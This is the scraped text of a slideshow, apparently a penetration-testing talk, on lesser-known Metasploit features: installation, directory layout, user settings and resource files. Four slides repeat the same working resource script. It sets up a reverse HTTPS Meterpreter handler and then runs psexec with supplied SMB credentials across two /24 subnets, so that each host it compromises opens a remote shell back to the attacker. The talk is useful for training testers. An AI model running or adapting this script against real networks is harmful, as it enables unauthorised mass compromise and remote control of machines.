Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Metasploit magic the dark coners of the framework

1,899 views

Published on

  • Be the first to comment

Metasploit magic the dark coners of the framework

  1. 1. Metasploit Magic A little sleight of hand
  2. 2. But first...
  3. 3. Installing Metasploit svn co https://metasploit.com/svn/trunk msf
  4. 4. not.. here
  5. 5. ESPECIALLY not here
  6. 6. it is a SYN
  7. 7. SRSLY!
  8. 8. here is ok ;-)
  9. 9. and remember... this isn’t the only place you can install it...
  10. 10. Directory Structure HACKING msfd msfrpcd documentation msfmachscan psexec.rc msfconsole msfrpc armitage msfgui plugins data msfpescan scripts msfcli tools README msfencode bins modules msfpayload external msfelfscan msfupdate lib msfopcode
  11. 11. ~/.msf3/ • history, logs, loot • msfconsole.rc • YOUR SETTINGS • modules • YOUR MODULES
  12. 12. resource files line by line script can understand ruby for meterpreter sessions now! ./msfconsole -r psexec.rc msf> resource psexec.rc
  13. 13. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  14. 14. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  15. 15. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  16. 16. use multi/handler setg PAYLOAD windows/meterpreter/reverse_https setg LHOST 192.168.1.100 setg LPORT 443 set ExitOnSession false exploit -j -z ! use windows/smb/psexec set SMBUser AdminBob set SMBPass ThisPasswordSucks set SMBDomain . set DisablePayloadHandler true ! <ruby> ! require 'rex/socket/range_walker' ! rhosts = '10.10.10.0/24,10.10.14.0/24' ! iplist = Rex::Socket::RangeWalker.new(rhosts) iplist.each do |rhost| self.run_single("set RHOST #{rhost}") self.run_single("exploit -j -z") end </ruby> ! psexec scanner
  17. 17. magic • user .*psexec
  18. 18. other fun... • script • color = false • screen
  19. 19. meterpreter>guid • twitter.com/mubix • mubix[hak5.org]

×